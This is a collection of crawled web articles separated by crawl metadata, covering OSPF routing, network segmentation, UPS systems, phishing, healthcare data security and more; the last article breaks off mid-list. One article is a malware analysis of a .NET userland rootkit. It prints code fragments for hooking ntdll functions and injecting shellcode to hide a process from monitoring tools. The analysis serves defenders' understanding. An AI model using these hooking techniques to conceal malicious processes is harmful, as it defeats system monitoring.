anything external to the area, you’d need to traverse the ABR . If you need to traverse the ABR, why would all of the routers in the stub area need the specific external routes to tell them to talk to the ABR? Why not just give them one default route to the ABR? The rules for stub areas are… -ABRs advertise in a type 3 network summary LSA -Do not advertise type 4 LSAs into the stub area -Do not advertise type 5 LSAs into the stub area -Stub router’s set a specific ‘E-Bit’ inside their hellos to 0. OSPF stub router’s will ONLY peer with other routers that have this bit set. -Since we aren’t advertising type 5 LSAs (AS External) ASBRs can NOT exist in a stub area. Totally Stubby areas Taking the stub are to the next level totally stubby areas also block type 3 (Network Summary) LSAs. After all, if you are using a 0s route through an ABR to get out of the area anyway, why do you need the network summaries from other areas? Not so Stubby Areas (NSSAs) NSSAs allow a stub areas to have an ASBR inside of them. This would allow a stub area to learn routes from an external source and then advertise them into the OSPF domain. The NSSA LSA has something called the “P bit’ inside of it. The P bit determines whether or not the actual type 7 LSA gets distributed out of the stub area. If set to 0 the ABR will not advertise it out into OSPF. If set to 1 the ABR will translate the LSA to a type 5 and flood throughout the OSPF domain. This option allows you to learn external prefixes only within a given area. This chart sums up the area type and LSAs that are allowed… OSPF metric and path determination The last thing I want to talk about in this post is the OSPF metric and how OSPF routers find the shortest path. OSPF is based on Dijkstra’s shortest path algorithm. While I’m not going to dive into the algorithm itself, we can sum it up by saying the lowest cost to a prefix is the winning path. Cisco has a default interface cost for specific interface types. Basically, unless you set it to something else manually (common) these are the only values that I think you need to know… Fast Ethernet (Faster than 100 meg ) – 1 T1 – 64 The rest of the values in the book are for interface speeds I haven’t dealt with in years (and even then they were old). So in our topology, we have all of them set to a cost of 1. The cost to a particular destination is the cost of all of the outgoing interfaces on the way to the destination. For instance if we look at our topology… And then look at the routing table on router1… We can see that most of the routers are learned by OSPF (’O’). We can also determine it’s OSPF because of the admin distance of the routes (110). The number next to the 110 is what we are interested in here. That number represents the routes ‘metric’. So doing some stare and compare here we can pretty easily verify what we are seeing… To get to 10.0.0.28 /30 we have to go through 4 interfaces. Router1’s interface, one of switch1’s interface, then either router3 or router4, and then finally router5. This is also a good example of how OSPF can insert equal cost paths into the FIB. I’m not going to beat the dead horse here, but I will look at the path to 10.1.1.1/32 quickly since that’s showing 5. The only matter of interest here is that going internally from a interface to a loopback apparently costs as a ‘hop’ hence the metric is 5. So that’s the default metric. The metric can be change manually per interface using the interface subcommand ‘ip ospf cost <cost>; command. For instance, if we change the cost on router5’s interface facing router6 to 70… We can see that reflected in router1’s FIB… That’s really all there is to it. I’ve officially updated my OSPF post outline to include two other posts where I’ll go through some area and LSA examples as well as spend some time getting comfortable with the OSPF RIB data.
<urn:uuid:280c1244-6c5a-47ca-a03c-e8caa8fefce9>
CC-MAIN-2022-40
https://www.dasblinkenlichten.com/ospf-finding-the-best-path/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00221.warc.gz
en
0.938262
3,767
2.5625
3
Standardized hardware, the advent of cloud and other virtual platforms, as well as the low cost of Linux has led the Unix world down the path of standardization under open source software. When originally developed, commercial Unix solutions such as Solaris, HP-UX, AIX, and others were custom built to accommodate proprietary hardware configurations using proprietary drivers. It is no longer cost-effective for commercial concerns to develop their own OS. And, as the industry embraces standardization and common platforms, commercial Unix platforms will soon cease to exist. Open source has permitted the best ideas from the various commercial platforms to be integrated into one standard operating system. Large commercial environments have also taken a containerized approach to software deployments, and OS standardization is the cornerstone of such deployments. Proprietary operating system development customarily involved the development of alternative processes and management tools such as “Smitty” in AIX, or “Management Console” in Solaris, and other processes that deviated from more common approaches. Unfortunately, this forced system administrators to learn multiple tools and methods for doing virtually the same thing. Each commercial deviation from common approaches caused downstream changes in other software that was installed on servers. Directory changes, tools used to manage network connections, or other software had to be modified to work properly on each variant. This took focus away from developing best practices and standards that were common to all Unix platforms. Through open source software, these deviations were normalized, and the best methods have been incorporated into the Linux operating system. The downside with Linux as an on open source software is that, in most cases, there is only community support to resolve any issues or vulnerabilities in software and supporting libraries. However the fact that the open source community has a roughly 10-year track record of quickly responding to reported has helped foster considerable confidence in the Linux operating system. With commercial Unix variants, the source code and libraries are all custom-developed and underwritten by the company that delivers them. For large commercial organizations, even though that security comes at a premium, it has traditionally been considered worthwhile. The recent acquisition by IBM of Redhat Linux brings significant credibility to the open source software on which it is built, and this indicates a further trend towards standardization of the operating system to Linux. How Standardization Simplifies Access One of the foremost benefits inherent of common platforms and standardized operating systems is consensus and standardization of access and asset models in all enterprises. Once a standard method is agreed upon, it will be possible to focus more effort on securing systems and standardizing access to them. Resources that were previously focused on esoteric development threads can be rededicated to developing common access policies and collecting asset data to strengthen their security program. With a common operating system such as Linux, it is possible to deliver significant return on investment from BeyondTrust’s Endpoint Privilege Management solution for Unix and Linux servers, and the rest of our suite of products. One alternative use for our Unix/Linux server solution is to take advantage of the trusted agent nature of a deployment and to use the agents to collect consistent data from assets within the network. Another use would be to leverage the solution’s infrastructure as a gateway into any corporate environment where access to any resource is granted based upon the conditions desired by the customer. Focusing on a common operating system provides an opportunity to develop standards among tools and software and to introduce common points of conditional access into any environment. As the presence of commercial Unix variants begins to diminish due to standardization and consensus among consumers, there lies an opportunity to further expand the same controls that govern privileged access to the broader corporate environment. To learn how BeyondTrust and our extensible suite of privileged access solutions can help your organization’s journey toward audit and regulatory compliance, and secure access at any level, contact us. Chad Erbe, Professional Services Architect, BeyondTrust Chad Erbe is a Certified Information Systems Security professional (CISSP), with nearly 30 years’ experience in a Unix/Linux administration role. Chad has worked in DoD high-security environments, manufacturing, and with large financial services companies throughout his career. This broad experience has lead him to an architectural role with BeyondTrust where he focuses on Privileged Access Management, particularly in the Unix suite of products. Chad also maintains his PCI ASV certification from the PCI council.
<urn:uuid:0a302e62-d619-44dd-9833-b03f10f0bbc0>
CC-MAIN-2022-40
https://www.beyondtrust.com/blog/entry/e-pluribus-unix-out-of-many-linux
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00221.warc.gz
en
0.954526
888
3.0625
3
Macro-segmentation is another term for traditional network segmentation. The goal of macro-segmentation is to break up a network into multiple discrete chunks to support business needs. One example of a common use of macro-segmentation is the isolation of development and production environments. Applications currently under development are likely to contain exploitable vulnerabilities or other issues, making them a potential threat to enterprise security or the functionality of the rest of the network. Segmenting the development network off from the production network enables untrusted applications to be tested without posing a risk to the organization’s network stability and ability to operate. Macro-segmentation is often implemented as an overlay on an organization’s physical network infrastructure. This is accomplished using a combination of firewalls and virtual local area networks (VLANs). A VLAN is a virtualized network that defines how traffic should be routed over the physical network. This means that, if two systems are on different VLANs, it may not be possible for traffic to be routed directly between them. Instead, the VLANs are configured so that all traffic between VLANs must first pass through a firewall. This makes it possible for the firewall to enforce boundaries between VLANs – i.e. block any traffic that attempts to cross a VLAN boundary without authorization – and perform security inspection and enforcement of access control policies. Macro-segmentation and micro-segmentation are both methods of dividing an organization’s network into sections and can provide a number of benefits. However, macro-segmentation and micro-segmentation policies are very different: Macro-segmentation transforms an organization’s network from a monolith to a collection of discrete subnets. This provides a number of advantages to an organization: Macro-segmentation uses internal network firewalls to define VLANs and perform content inspection of traffic flowing across VLAN boundaries. This provides a number of different advantages to an organization, and is likely a critical component of a company’s data security and regulatory compliance strategy. However, organizations must also consider the usability of their network infrastructure when designing and implementing a strategy for deploying macro-segmentation within their networks. If all internal network traffic crossing segment boundaries will be forced to pass through internal network firewalls, then organizations need firewalls with high throughput and robust, security inspection capabilities in order to maximize both network performance and security. Check Point’s security solutions enable organizations to implement effective macro-segmentation through their entire network infrastructure. Check Point next-generation firewalls (NGFWs) provide robust security and high throughput for on-premises infrastructure, while Check Point CloudGuard provides cloud-native visibility and security solutions for an organization’s cloud-based deployments. To see these solutions in action, request demos of Check Point NGFW and CloudGuard Infrastructure as a Service (IaaS) solutions.
<urn:uuid:e5e4a7b9-fe04-4fb8-8235-4941997b52df>
CC-MAIN-2022-40
https://www.checkpoint.com/cyber-hub/network-security/what-is-macro-segmentation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00221.warc.gz
en
0.916028
613
2.953125
3
Rootkits are tools and techniques used to hide (potentially malicious) modules from being noticed by system monitoring. Many people, hearing the word "rootkit" directly think of techniques applied in a kernel mode, like IDT (Interrupt Descriptor Table) hooking, SSDT (System Service Dispatch Table) hooking, DKOM (Direct Kernel Object Manipulation), and etc. But rootkits appear also in a simpler, user-mode flavor. They are not as stealthy as kernel-mode, but due to their simplicity of implementation they are much more spread. That's why it is good to know how they works. In this article, we will have a case study of a simple userland rootkit, that uses a technique of API redirection in order to hide own presence from the popular monitoring tools. //special thanks to @MalwareHunterTeam The rootkit codeThis malware is written in .NET and not obfuscated - it means we can decompile it easily by a decompiler like dnSpy. As we can see in the code, it hooks 3 popular monitoring applications: Process Explorer (procexp), ProcessHacker and Windows Task Manager (taskmgr): Let's try to run this malware under dnSpy and observe it's behavior under Process Explorer. The sample has been named malware.exe. At the beginning it is visible, like any other process: ...but after executing the hooking routine, it just disappears from the list: Attaching a debugger to the Process Explorer we can see that some of the API functions, i.e., NtOpenProcess starts in atypical way - from a jump to some different memory page: The redirection leads to the injected code: It is placed in added memory page with full access rights: We can dump this page and open it in IDA, getting a view of 3 functions: The code of the first function begins at offset 0x60: The space before is filled with some other data, that will be discussed in a second part of the article. Rootkit implementationLet's have a look at the implementation details now. As we saw before, hooking is executed in a function HookApplication. Looking at the beginning of this function we can confirm, that the rootkit's role is to install in-line hooks on particular API functions: NtReadVirtualMemory, NtOpenProcess, NtQuerySystemInformation. Those functions are imported from ntdll.dll. Let's have a look at what is required in order to implement such a simple rootkit. The original decompiled class is available here: ROOT1.cs. Preparing the dataFirst, the malware needs to know the base address, where ntdll.dll is loaded in the space of the attacked process. The base is fetched by a function GetModuleBase address, that employs enumerating through the modules loaded within the examined process (using: Module32First - Module32Next). Having the module base, the malware needs to know the addresses of the functions, that are going to be overwritten. The GetRemoteProcAddressManual searches those address in the export table of the found module. Fetched addresses are saved in an array: //fetch addresses of imported functions: func_to_be_hooked = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory") ); func_to_be_hooked = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess") ); func_to_be_hooked = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation") );Code from the beginning of those functions is being read and stored in buffers: //copy original functions' code (24 bytes): original_func_code = ROOT1.ReadMemoryByte(intPtr, (IntPtr)((long)((ulong)func_to_be_hooked)), 24u); original_func_code = ROOT1.ReadMemoryByte(intPtr, (IntPtr)((long)((ulong)func_to_be_hooked)), 24u); original_func_code = ROOT1.ReadMemoryByte(intPtr, (IntPtr)((long)((ulong)func_to_be_hooked)), 24u);The small 5-byte long array will be used to prepare a jump. The first byte, 233 is 0xE9 hex, and it represents the opcode of the JMP instruction. Other 4 bytes will be filled with the address of the detour function: Another array contains prepared detours functions in form of shellcodes: Shellcodes are stored as arrays of decimal numbers: In order to analyze the details, we can dump each shellcode to a binary form and load it in IDA. For example, the resulting pseudocode of the detour function of NtOpenProcess is: So, what does this detour function do? Very simple filtering: "if someone ask about the malware, tell them that it's not there. But if someone ask about something else, tell the truth". Other filters, applied on NtReadVirtualMemory and NtQuerySystemInformation (for SYSTEM_INFORMATION_CLASS types: 5 = SystemProcessInformation, 16 = SystemHandleInformation) - manipulates, appropriately: reading memory of the hooked process and reading information about all the processes. Of course, the fiters must know, how to identify the malicious process that wants to remain hidden. In this rootkit it is identified by the process ID - so, it needs to be fetched and saved in the data that is injected along with the shellcode. The detour function of NtReadVirtualMemory will also call from inside functions: GetProcessId and GetCurrentProcessId in order to apply filtering - so, their handles need to be fetched and saved as well: getProcId_ptr = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId") ); getCuttentProcId_ptr = (uint)((int)ROOT1.RemoteGetProcAddressManual(intPtr, (uint)((int)ROOT1.GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId") ); Putting it all togetherAll the required elements must be put together in a proper way. First, the malware allocates a new memory area, and copies all the elements in order: BitConverter.GetBytes(getProcId_ptr).CopyTo(array, 0); BitConverter.GetBytes(getCuttentProcId_ptr).CopyTo(array, 4); //... // copy the current process ID BitConverter.GetBytes(Process.GetCurrentProcess().Id).CopyTo(array, 8); //... // copy the original functions' addresses: BitConverter.GetBytes(func_to_be_hooked).CopyTo(array, 12); BitConverter.GetBytes(func_to_be_hooked).CopyTo(array, 16); BitConverter.GetBytes(func_to_be_hooked).CopyTo(array, 20); //... //copy the code of original functions: original_func_code.CopyTo(array, 24); original_func_code.CopyTo(array, 48); original_func_code.CopyTo(array, 72);After this prolog, the three shellcodes are being copied into the same memory page - and the page is injected into the attacked process. Finally, the beginning of each attacked function is being patched with a jump, redirecting to the appropriate detour function within the injected page. Bugs and LimitationsThe basic functionality of a rootkit has been achieved here, however, this code contains also some bugs and limitations. For example, it causes an application to crash if the functions have been already hooked (for example in the case if the malware has been deployed for the second time). It is caused by the fact that the hook needs also a copy of the original function in order to work. The hooking function assumes, that the code in the memory of ntdll.dll is always the original one and it copies it to the required buffer (rather than copying it from the raw image of ntdll.dll). Of course this assumption is valid only in optimistic case, and fails if the function was hooked before. There are also many limitations - i.e. - the hooking function is deployed only at the beginning of the execution, but when we deploy a monitoring program while the malware is running, we can still see it - set of hooked applications is small - we can still attach to the malware via debugger or view it by any tool that is not considered by the authors - the implemented code works only for 32 bit applications ConclusionThe demonstrated rootkit is very simple, probably created by a novice. However, it allows us to illustrate very well the basic idea behind API hooking and how it can be used in order to hide the process. This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.
<urn:uuid:2160c7d5-435a-43fd-9356-c1efa16cfa2e>
CC-MAIN-2022-40
https://www.malwarebytes.com/blog/news/2016/12/simple-userland-rootkit-a-case-study
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00221.warc.gz
en
0.832702
2,234
2.953125
3
Almost all businesses are going through digital transformation today, and there are several tools that are helping businesses to undergo this transformation efficiently. FREMONT, CA: When it comes to digital transformation, technology is almost often mentioned first. Whether it's the Internet of Things (IoT) or Artificial Intelligence (AI), technology is transforming the way businesses operate all around the world. While there's no denying that technology is an integral part of digital transformation, there are other important factors to consider before embarking on a digital transformation strategy. Identifying value-driven business objectives and cultivating a culture of change and collaboration are among them. Four most common tools for digital transformation are: Internet of Things (IoT) IoT technology provides unprecedented access to both products and processes for manufacturers. Industrial IoT technology is being used by companies to acquire a better knowledge of their operations on a global and industrial level. Manufacturers are accomplishing key digital transformation objectives like better productivity, flexibility to respond rapidly to market and consumer demands, and innovation across their goods and services, thanks to greater insights and analytics from IoT. The method of constructing an object one thin layer at a time is known as additive manufacturing or 3-D printing. Additive manufacturing has ramifications across the value chain, not only in manufacturing, as industrial firms seek efficiency. If consumers or field operators may print replacement components for a machine, for example, this allows for more efficient, seamless customer service, reduced downtime, and cheaper servicing costs. Manufacturing firms, particularly discrete and process-oriented firms, have been reticent to embrace the cloud. There are various reasons for this hesitancy, but with recent improvements in cloud technology, those fears are dissipating. Most digital transformation programs make use of the cloud because it provides better flexibility, agility, and scalability throughout a business. Mobile technologies offer a plethora of benefits to manufacturing and industrial businesses, particularly with the advent of 5G capabilities. In many ways, mobile is a basic technology that allows for the development of other game-changing technologies. For example, shop floor employees can use Augmented Reality to monitor machine data points, field service technicians can use AR to get interactive, real-time instruction from specialists at Headquarters to fix an industrial asset, and engineers can use AR to study CAD drawings on the go. There will be rippling effects throughout the industrial business as mobile becomes even more powerful with 5G.
<urn:uuid:015fb7a6-751d-4f86-95d1-577761893506>
CC-MAIN-2022-40
https://www.cioadvisorapac.com/news/four-most-common-tools-for-digital-transformation-nwid-2691.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00221.warc.gz
en
0.936019
501
2.5625
3
Certain industries require constant, uninterrupted power. These industries include government, IT, transportation, and financial services. When power is needed continuously, it’s essential to have an Uninterruptible Power Supply, otherwise known as a UPS. These services are able to provide a continuous flow of power through any size of infrastructure. There are two types of UPS systems; centralized and rack-mount. It’s important to determine which type of UPS provider is right for you and your organizational needs. While the two providers have the same goal, namely the endless flow of power, especially during times of usual power troubles, they go about reaching that goal in different ways. Both rack-mount and centralized UPS systems have features that differentiate them from one another. In order to choose the system that is best for your purposes, you will want to understand the differences, as well as the advantages and disadvantages of each. With centralized UPS systems, there are a couple of UPSs near the perimeter of the server room or in a nearby independent location. They are basically one large centerpoint that makes up the entire network of an organization. Many organizations choose a centralized UPS system for a variety of reasons. They can be large and are able to hold multiple components, making them a versatile option. Along with their larger size, they are incredibly reliable and have a great response time. When some sort of overload occurs, centralized systems are able to take on and respond properly to excessive currents. Another benefit of a centralized UPS system is that they are constantly monitored to ensure proper functioning. That means if something does happen to go wrong, the issue will be discovered and addressed right away. These systems can be a great option for many organizations. They are consistent, reliable, and stable. Running online, they are able to stay on task with no power disruptions. While there are multiple advantages to the centralized UPS system, there are also a number of disadvantages that could give you pause before choosing this option. Centralized systems require a lot of energy to set up and run, making them a non-eco-friendly option. Due to the excessive energy used by these systems, the cost to run and obtain power from them seems astronomical. Not only that, but centralized systems need another high-voltage system to run properly, or multiple runs with low-voltage. Again, these are costly and excessive features that make them a poor choice for many organizations. Instead of having one central system, rack-mount UPS systems in or adjacent to the server rack, which means that every server has the UPS hardware connected. Instead of having a centralized system that works in a certain area, a rack-mount UPS is a continual system with hardware throughout. This is optimal because if there is an issue with one area, the rest will continue to work. With a centralized UPS system, if one system goes out, the whole thing goes out. Rack-mount UPS systems are regularly monitored, with any issues discovered right away. If anything goes out, only one area goes out and will be addressed quickly. These systems are smaller than the centralized ones and cost a lot less, too. They work well due to the many small servers. The short distance between the servers leads to consistent power and reduced risks. Their small size makes them easy to set up, move, and reinstall as needed. The small size makes rack-mount UPS systems less energy efficient than centralized ones. They run at a lower percentage capacity and cause waste and redundancy. Rack-mount UPS tends to be managed inefficiently due to the servers and the need for IT. However, rack-mounts are still the ideal solution for networking and server applications. By taking care of the cooling of hardware components in the rack, they provide a seamless, streamlined mode for consistent power.
<urn:uuid:8619bf6d-b003-4e14-9b96-65c1c0a4c1b4>
CC-MAIN-2022-40
https://www.hcienergy.com/blog/should-i-install-a-rack-mount-ups-or-a-centralized-ups
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00221.warc.gz
en
0.965819
801
2.59375
3
Human and Computer Cognition In my mind, the future is not in how we interact with computers, but how computers interact with us, and how lifelike we can make the series of connected artificial intelligence that will become a part of our daily lives. What do I mean by Artificial Intelligence? My view of AI is a program capable of some level of autonomy and intelligence, not a super-intelligent system of the sort Elon Musk seems to fear appearing in the near future. That level of intelligence, a true simulation of the human mind, is probably impossible. Of course, that doesn’t mean that our machines do not and will not ever have any degree of intelligence. In the words of Alan Turing, “May not machines carry out something which ought to be described as thinking but which is very different from what a man does?” That is, just because a computer’s thought won’t resemble that of a human doesn’t mean that it won’t be, on some level, intelligent. Machine intelligence is already superior to human intelligence in recall, math, and logic, so we should see it as a parallel to human intelligence rather than a replacement for it. What will that look like? Already people are becoming accustomed to the ease of use an intelligent system can provide. After just a few days of using the Amazon Echo, a voice-enabled wireless speaker, trying to change music with anything else feels clunky and unusable by comparison. In the future, we will likely see technologies like this extended onto entire houses, with interconnected appliances controlled by a user’s voice and capable of learning from that user’s routines and daily actions. Obviously privacy and security are major concerns, but not the focus here. As part of my summer internship, I was tasked with attempting to fly a small consumer drone using an $800 cognitive headset. Weeks of experimenting with third party software ended with me only able to direct the drone forward and backward, and not with any real precision. Other attempts at cognitive control of remote vehicles seem to have been largely successful only when the pilot was trained in meditation or other cognitive discipline. I did have the chance to demonstrate the headset on a coworker’s young son, and he had no difficulty at all using multiple inputs to interact with a simulated object. While the technological limitations are clearly the largest hurdle that still needs to be overcome, the mental limitations of the user cannot be disregarded. Perhaps younger generations, growing up with easy access to this technology, will have an easier time interacting with it, but either way, I believe that widespread cognitive control is still many years away. Can Cable Contribute? Most intelligent products today are dependent on an internet connection. The Amazon Echo, for example, quickly becomes a fancy paperweight without a constant, strong connection. Any additional connected device will only increase the homeowner’s bandwidth usage. If these intelligent devices eventually achieve mass adoption, we will need much more powerful and reliable networks than we have today. The Big Picture Artificial intelligence has the potential to radically improve our standard of living across the board. Robots are already replacing humans in menial production tasks, so why couldn’t an AI eventually replace an accountant or data analyst? The obvious fear this sort of thinking creates is that we eventually end up in a world similar to that envisioned by Aldous Huxley in his famous novel “Brave New World,” one in which humanity has become a race of technicians, maintaining machines that produce their art and music. Personally, I don’t think we have anything to fear, at least in terms of our total replacement by machines. In the words of Thomas J. Watson Jr, the namesake of IBM’s famous Watson supercomputer, “Computing will never rob man of his initiative or replace the need for creative thinking. By freeing man from the more menial or repetitive forms of thinking, computers will actually increase the opportunities for the full use of human reason.” Artificial intelligence will never be able to fully replace our creativity, spontaneity, and compassion, much in the same way that no human will ever have the same instant recall and data analysis abilities of a powerful computer. As such, the AI of the future will work in concert with us, its unparalleled computational power combined with our creativity and problem solving. Sean Fernandes is currently in his third year of undergraduate studies at the University of British Columbia majoring in Cognitive Systems, a mixture of Computer Science, Psychology, and Philosophy, exposing him to a number of perspectives on the future of our interactions with computers and their implications.
<urn:uuid:7e14364b-3fec-4c0d-aeda-853874df6351>
CC-MAIN-2022-40
https://www.cablelabs.com/blog/human-computer-cognition
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00421.warc.gz
en
0.951294
957
2.75
3
The more the Cyber threat landscape changes and diversifies, the more it holds the same. Still, in today’s date, there are some old tactics in the playbook of hackers that remain successful and most prevalent. In the year 2018, the wide majority of data leakage incidents were attempted by Cybercriminals external on the aimed enterprise. Unfortunately, major of these attacks were successfully attempted usually by activities performed by an internal business employee. Whether it be an unintentional mistake, a sudden accident, or clearly being mousetrapped by an attractive kind of proposal, human beings continue to fall victim to phishing attacks. Through this post, we want to aware readers of why hackers are still getting successful outcomes whenever they attempt phishing attacks on the targeted company. After this, one is going to read measures of preventing phishing attacks, which are not just to read but to implement as well! Are Human Beings Major Cause for Phishing Attacks? With the growth in the awareness about information security, business officials continue – albeit unknowingly – helping internet criminals to enter into the targeted systems. It is hard to accept but, it is a bitter truth that ‘humans are still the weakest link for each and every enterprise’s security architecture.’ As per the report given by Verizon data breach investigations 2018, the popular cause for the entire data breach incident was ‘accessing of stolen account credentials.’ Stolen passwords or compromised accounts data were blamed for 81% of attacking-associated data exposures in another latest company-wise Cybercrime survey. Another shocking fact in the same report was that these used credentials were collected via phishing attacks, or in situations where end-users downloaded different malware on their PC, unintentionally when they visited fraudulent websites. Don’t be disappointed, we have a solution to this problem! for preventing phishing attacks due to human errors, industries have to take the responsibility of training their employees and increase awareness regarding Cybersecurity. Although it is impossible to eliminate internet threats, they can be at least reduced up to a major extent. In today’s date, the reality is that a business employee from unknown geolocation makes a mistake on the public networks when he or she uses the enterprise’s resources online. This mistake is one point for which hackers look for attempting their intended threats. Earlier, phishing messages via email systems were easy to spot – they comprise misspelling, dangerous URLs, false alerts, or odd graphics. They were developed in a predominant manner to target the officials who have distracted, harried, irresponsible, or careless kind of nature. These kinds of persons don’t give a single thought before opening malicious emails and just access them without considering further consequences. Is There Any Change in Today’s Phishing Attacks? Nothing has been changed in the phishing attacks; only there is an update in them. The attempts to advance phishing rely on more sophisticated ideas, which are unpredictable. The availability of a huge amount of personal data on social media networks permits hackers to craft emails, which are customized with intention of exploiting user recipients’ unique vulnerabilities. There are chances that phishing attackers have perfectly copied the content and graphics from the authentic notification messages mailed by enterprises being spoofed. In fact, some emails might have a secretive code within them, which executes automatically when a person opens those emails. Not only business employees but, businesses are also vulnerable. It is so because industries fail in taking essential Cybersecurity measures that are needed to overcome cloud computing security risks. Though different researches have proven that security awareness training is an effective medium to reduce the overall data leakage risks in a company but, several enterprises do not have time or budget to deliver this education to their employees. In the upcoming section, we are going to suggest some measures for preventing phishing attacks. We request enterprises to implement approaches properly in their firm and at least tighten up the security from their end. Best Practices For Avoiding Phishing Attacks Here are some of the best practices that email client users should take to secure their network from phishing attacks and other kinds of social engineering-related threats. - Make Use of MFA – One of the best methods to protect network asset threats is multi-factor authentication. When this authentication method gets activated in a tenant, users have to ensure CSP that at least they have two unique tokens to access the business network. This feature is present as an in-built option in many of the popular email clients like Microsoft Office 365, Google cloud platform, etc. By enabling this feature, individuals validate their identity, before using the email account. - Enforce CASB Solution – As time passes away, preventing phishing attacks is getting tougher to achieve. Enterprises should begin use of a cloud access security broker (CASB) product in their premises, which sits in between the CSP and client’s on-premises architecture. The CASB solution acts like a gatekeeper, which enables industries to explore the reach of their cloud security standards beyond their own architecture. Don’t Let Phishing Attacks Take Over Your Business The wisest measures for preventing phishing attacks of your company from those that focus mainly on data monitoring and detection system. Nothing is impossible, the only thing is that businesses have to take the responsibility of securing their network infrastructure seriously. Rest, cloud computing is the best platform to grow and spread the business globally!
<urn:uuid:fb0f37b0-23f1-419a-a888-5f9972a4dbb5>
CC-MAIN-2022-40
https://www.cloudcodes.com/blog/preventing-phishing-attacks.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00421.warc.gz
en
0.94887
1,102
2.625
3
Listening to your gut will be much safer if you also listen to the machine crunching the data. Decision-making remains one of the ultimate tests for leadership in new entrepreneurs. Even experienced leaders who have a track record of sound decision-making have, at some point, made a drastically poor decision that shook their reputation. As the talk about AI promises a radical transformation of the organization, leaders are especially curious to know if it will make it easier for them. While a lot of them are excited, some of them don’t want decision-making made easier. Their ability to make sound decisions without complex technology is the very foundation of their reputation as good leaders. The good news is that AI is quite unlikely to make it easier for decision makers as they’ll be required to input judgment in the machine predictions. As the real impact remains to be seen, there are ways in which AI is set to inevitably affect business decision-making. Through data mining, many businesses are already using predictive analytics to make better decisions. Predictive analytics allows businesses to anticipate events by looking at a data set and trying to guess accurately what will happen at a certain time in the future. AI brings with it machine learning, another technique used in predictive analytics. The variation is that while data mining involves merely identifying patterns in large data sets, in machine learning, machines are not just designed to learn from the data, they are also built to react to it by themselves. With the information provided, decisions can be made on such issues as: - Which ads are served based on cost-effectiveness and potential ROI - How to optimize the buyer journey by analyzing consumer behavior - How to reduce customer churn - How achievable are the set goals Less decision fatigue Various psychological studies have shown that when we’re faced with many decisions to make within a short period of time, quality declines because we gradually deplete our mental energy. A case application of this is when supermarkets place candy and snacks at the cash register. Marketers know you’ll be making decisions throughout your short shopping trip and will be less likely to resist the sugar rush by the time you’re done. But you know who can resist the sugar? A machine. Algorithms, not prone to decision fatigue, can make an infinite number of decisions per day, each as accurate as possible. Executives who use AI will be at an advantage by using it to bypass human weakness. When making complex decisions, executives typically need to look at a set of different factors. Where there’s too much data to be considered, the decision-maker may get overwhelmed, leading to disastrous decisions. On the contrary, a machine can easily handle multiple inputs without exhaustion or confusion. All that’s needed is a set of instructions or programs that guide the machine to use probability and suggest or implement the most logical decision. […]
<urn:uuid:95dbfc83-cd50-4c6b-ac32-e97cc7304157>
CC-MAIN-2022-40
https://swisscognitive.ch/2018/08/18/artificial-intelligence-can-help-leaders-make-better-decisions-faster/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00421.warc.gz
en
0.950599
604
2.625
3
In 2017, there were more than 340 data breaches reported according to the breach tool of the U.S. Department of Health and Human Services. Increasingly, the healthcare industry becomes an easy target for hackers due to the significant value of patient data. There are different causes of data breaches in healthcare that could be a critical factor in data breaches, some of them are: - Human error - Physical theft Every health organizations must pay attention to those causes to further gain knowledge on how they will combat cyber attacks. Cyber criminals’ interest in healthcare data has been increasing due to sensitive and personal information from patients they could use to conduct crime. They could use a patient’s information, for example, to make a fake ID to use in buying drugs to be resold, this type of cyber crime is called identity theft. So, how do you secure your patient’s data despite the internet threats posed by cyber criminals today? Effective Ways to Secure Healthcare Data Medical data is not perishable so it’s more valuable than financial data. However, cyber criminals highly target biotech and pharmaceutical intellectual data nowadays. So if you’re in the healthcare industry, particularly keeping these kinds of data, make sure to double your security controls. Here are some proven ways to secure your healthcare data: - Identify sensitive information that needs utmost security. In order to secure your patient’s data, it’s important to consider automated data discovery of sensitive information. Usually, this is offered by security providers. It scans the network and identifies database servers and services that contain any sensitive information. - Monitor and assess database to find out vulnerabilities and misconfiguration. For healthcare organizations, it’s crucial to scan databases for potential weaknesses and risks to healthcare data. Once they are pinpointed, organizations can easily identify remediation strategies to prevent cybersecurity threats. - Check data usage regularly to monitor data access activities. Monitoring and auditing data usage activities is important such as applications and privileged user’s activity. In addition, it helps detect and alert your IT team when there’s an unauthorized access in your database. With regular monitoring, you can also determine what appropriate actions to take to block suspicious access. - Identify users that may pose threat to the database system. Some data security services provide machine learning in order to automatically reveal unusual data activities. It instantly profiles data and user activity to set up a baseline. Activities that will deviate from the baseline is automatically identified as threat to prevent a cybersecurity attack. - 